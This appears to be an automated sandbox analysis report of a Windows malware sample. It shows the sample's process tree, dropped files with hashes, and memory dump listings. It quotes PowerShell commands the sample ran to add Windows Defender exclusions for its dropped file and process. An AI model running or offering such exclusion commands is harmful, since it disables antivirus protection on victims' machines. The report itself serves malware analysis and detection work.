C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\Iinpdftw.exe"C:\Users\Admin\AppData\Local\Temp\Iinpdftw.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\$77e1f23e"C:\Users\Admin\AppData\Local\Temp\$77e1f23e"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\$77f99bf3"C:\Users\Admin\AppData\Local\Temp\$77f99bf3"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\$77f99bf3'4⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77f99bf3'4⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Enumerates system info in registry
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD5ac4917a885cf6050b1a483e4bc4d2ea5
SHA1b1c0a9f27bd21c6bbb8e9be70db8777b4a2a640f
SHA256e39062a62c3c7617feeeff95ea8a0be51104a0d36f46e44eea22556fda74d8d9
SHA512092c67a3ecae1d187cad72a8ea1ea37cb78a0cf79c2cd7fb88953e5990669a2e871267015762fd46d274badb88ac0c1d73b00f1df7394d89bed48a3a45c2ba3d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
18KB
MD5d9a87334a1d8ba2357dcd483f46619d6
SHA1ddedc337ae9948626e725c6ea6c2e1f37e770442
SHA2560afd2c42ab9b82150495423c6b72322d60a2f506fa0bb814f7e8a57bbd5a4f4c
SHA512cfad686e601926235d64d9188bcf1468ce1500f909c7132580f958e16eaf3615adcc6f12e97520c5735f8a994a7e08c06204898b0da414fafb557065f44af42c
-
C:\Users\Admin\AppData\Local\Temp\$77e1f23eFilesize
4.7MB
MD5a9cb0e951c7ede7c23b5ba350b4920fd
SHA1a16b2377a77e86b2a2cd27d58c44218e8aaa1a66
SHA2560b75189b6f3d6e031159d20e351d60f6dd8956642e16d55083936096f73eb864
SHA512300111595b2ea4fc3143b25faca8f97e27286221456c792f5ea80b3fe066baf5d1d2fcca122ebe17362ea3f26fdb06388356be122389229745972bb6d0b6fad4
-
C:\Windows\Temp\__PSScriptPolicyTest_x2b2wwkr.dao.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/652-5671-0x0000000070010000-0x000000007005C000-memory.dmpFilesize
304KB
-
memory/652-5668-0x00000000066E0000-0x00000000066FE000-memory.dmpFilesize
120KB
-
memory/652-5689-0x0000000008240000-0x000000000825A000-memory.dmpFilesize
104KB
-
memory/652-5688-0x0000000008130000-0x0000000008145000-memory.dmpFilesize
84KB
-
memory/652-5687-0x0000000008120000-0x000000000812E000-memory.dmpFilesize
56KB
-
memory/652-5686-0x00000000080F0000-0x0000000008101000-memory.dmpFilesize
68KB
-
memory/652-5685-0x0000000008180000-0x0000000008216000-memory.dmpFilesize
600KB
-
memory/652-5684-0x0000000007F50000-0x0000000007F5A000-memory.dmpFilesize
40KB
-
memory/652-5683-0x0000000007EE0000-0x0000000007EFA000-memory.dmpFilesize
104KB
-
memory/652-5682-0x0000000008530000-0x0000000008BAA000-memory.dmpFilesize
6.5MB
-
memory/652-5681-0x0000000007920000-0x00000000079C4000-memory.dmpFilesize
656KB
-
memory/652-5680-0x0000000007900000-0x000000000791E000-memory.dmpFilesize
120KB
-
memory/652-5655-0x0000000001340000-0x0000000001376000-memory.dmpFilesize
216KB
-
memory/652-5670-0x00000000076C0000-0x00000000076F4000-memory.dmpFilesize
208KB
-
memory/652-5669-0x00000000069D0000-0x0000000006A1C000-memory.dmpFilesize
304KB
-
memory/652-5690-0x0000000008220000-0x0000000008228000-memory.dmpFilesize
32KB
-
memory/652-5667-0x00000000062D0000-0x0000000006627000-memory.dmpFilesize
3.3MB
-
memory/652-5658-0x00000000059D0000-0x0000000005A36000-memory.dmpFilesize
408KB
-
memory/652-5657-0x0000000005930000-0x0000000005952000-memory.dmpFilesize
136KB
-
memory/652-5656-0x0000000005CA0000-0x00000000062CA000-memory.dmpFilesize
6.2MB
-
memory/2752-4902-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/2916-5154-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmpFilesize
10.8MB
-
memory/2916-4919-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmpFilesize
10.8MB
-
memory/2916-4918-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmpFilesize
10.8MB
-
memory/2916-4914-0x0000021EE29C0000-0x0000021EE29EA000-memory.dmpFilesize
168KB
-
memory/2916-4913-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmpFilesize
10.8MB
-
memory/2916-4912-0x00007FFF96EB3000-0x00007FFF96EB5000-memory.dmpFilesize
8KB
-
memory/2916-4905-0x0000021EE2610000-0x0000021EE2632000-memory.dmpFilesize
136KB
-
memory/4500-5726-0x0000000005E20000-0x0000000006177000-memory.dmpFilesize
3.3MB
-
memory/4500-5728-0x0000000070010000-0x000000007005C000-memory.dmpFilesize
304KB
-
memory/4792-46-0x0000000006540000-0x000000000677F000-memory.dmpFilesize
2.2MB
-
memory/4792-34-0x0000000006540000-0x000000000677F000-memory.dmpFilesize
2.2MB
-
memory/4792-6-0x0000000006540000-0x000000000677F000-memory.dmpFilesize
2.2MB
-
memory/4792-5-0x0000000006540000-0x000000000677F000-memory.dmpFilesize
2.2MB
-
memory/4792-4891-0x0000000074FC0000-0x0000000075771000-memory.dmpFilesize
7.7MB
-
memory/4792-4892-0x00000000055A0000-0x0000000005622000-memory.dmpFilesize
520KB
-
memory/4792-4893-0x0000000005620000-0x000000000566C000-memory.dmpFilesize
304KB
-
memory/4792-10-0x0000000006540000-0x000000000677F000-memory.dmpFilesize
2.2MB
-
memory/4792-12-0x0000000006540000-0x000000000677F000-memory.dmpFilesize
2.2MB
-
memory/4792-15-0x0000000006540000-0x000000000677F000-memory.dmpFilesize
2.2MB
-
memory/4792-18-0x0000000006540000-0x000000000677F000-memory.dmpFilesize
2.2MB
-
memory/4792-4901-0x0000000074FCE000-0x0000000074FCF000-memory.dmpFilesize
4KB
-
memory/4792-20-0x0000000006540000-0x000000000677F000-memory.dmpFilesize
2.2MB
-
memory/4792-24-0x0000000006540000-0x000000000677F000-memory.dmpFilesize
2.2MB
-
memory/4792-26-0x0000000006540000-0x000000000677F000-memory.dmpFilesize
2.2MB
-
memory/4792-28-0x0000000006540000-0x000000000677F000-memory.dmpFilesize
2.2MB
-
memory/4792-30-0x0000000006540000-0x000000000677F000-memory.dmpFilesize
2.2MB
-
memory/4792-32-0x0000000006540000-0x000000000677F000-memory.dmpFilesize
2.2MB
-
memory/4792-5586-0x0000000005950000-0x00000000059A4000-memory.dmpFilesize
336KB
-
memory/4792-5613-0x0000000074FC0000-0x0000000075771000-memory.dmpFilesize
7.7MB
-
memory/4792-1-0x0000000000500000-0x00000000009B8000-memory.dmpFilesize
4.7MB
-
memory/4792-2-0x0000000006540000-0x0000000006786000-memory.dmpFilesize
2.3MB
-
memory/4792-3-0x0000000006D30000-0x00000000072D6000-memory.dmpFilesize
5.6MB
-
memory/4792-22-0x0000000006540000-0x000000000677F000-memory.dmpFilesize
2.2MB
-
memory/4792-38-0x0000000006540000-0x000000000677F000-memory.dmpFilesize
2.2MB
-
memory/4792-42-0x0000000006540000-0x000000000677F000-memory.dmpFilesize
2.2MB
-
memory/4792-44-0x0000000006540000-0x000000000677F000-memory.dmpFilesize
2.2MB
-
memory/4792-0-0x0000000074FCE000-0x0000000074FCF000-memory.dmpFilesize
4KB
-
memory/4792-48-0x0000000006540000-0x000000000677F000-memory.dmpFilesize
2.2MB
-
memory/4792-50-0x0000000006540000-0x000000000677F000-memory.dmpFilesize
2.2MB
-
memory/4792-52-0x0000000006540000-0x000000000677F000-memory.dmpFilesize
2.2MB
-
memory/4792-56-0x0000000006540000-0x000000000677F000-memory.dmpFilesize
2.2MB
-
memory/4792-58-0x0000000006540000-0x000000000677F000-memory.dmpFilesize
2.2MB
-
memory/4792-60-0x0000000006540000-0x000000000677F000-memory.dmpFilesize
2.2MB
-
memory/4792-62-0x0000000006540000-0x000000000677F000-memory.dmpFilesize
2.2MB
-
memory/4792-66-0x0000000006540000-0x000000000677F000-memory.dmpFilesize
2.2MB
-
memory/4792-68-0x0000000006540000-0x000000000677F000-memory.dmpFilesize
2.2MB
-
memory/4792-64-0x0000000006540000-0x000000000677F000-memory.dmpFilesize
2.2MB
-
memory/4792-54-0x0000000006540000-0x000000000677F000-memory.dmpFilesize
2.2MB
-
memory/4792-40-0x0000000006540000-0x000000000677F000-memory.dmpFilesize
2.2MB
-
memory/4792-36-0x0000000006540000-0x000000000677F000-memory.dmpFilesize
2.2MB
-
memory/4792-16-0x0000000006540000-0x000000000677F000-memory.dmpFilesize
2.2MB
-
memory/4792-8-0x0000000006540000-0x000000000677F000-memory.dmpFilesize
2.2MB
-
memory/4792-4-0x0000000006820000-0x00000000068B2000-memory.dmpFilesize
584KB
-
memory/5072-5616-0x0000000005E10000-0x0000000005E76000-memory.dmpFilesize
408KB
-
memory/5072-5615-0x0000000003C50000-0x0000000003CEC000-memory.dmpFilesize
624KB
-
memory/5072-5614-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB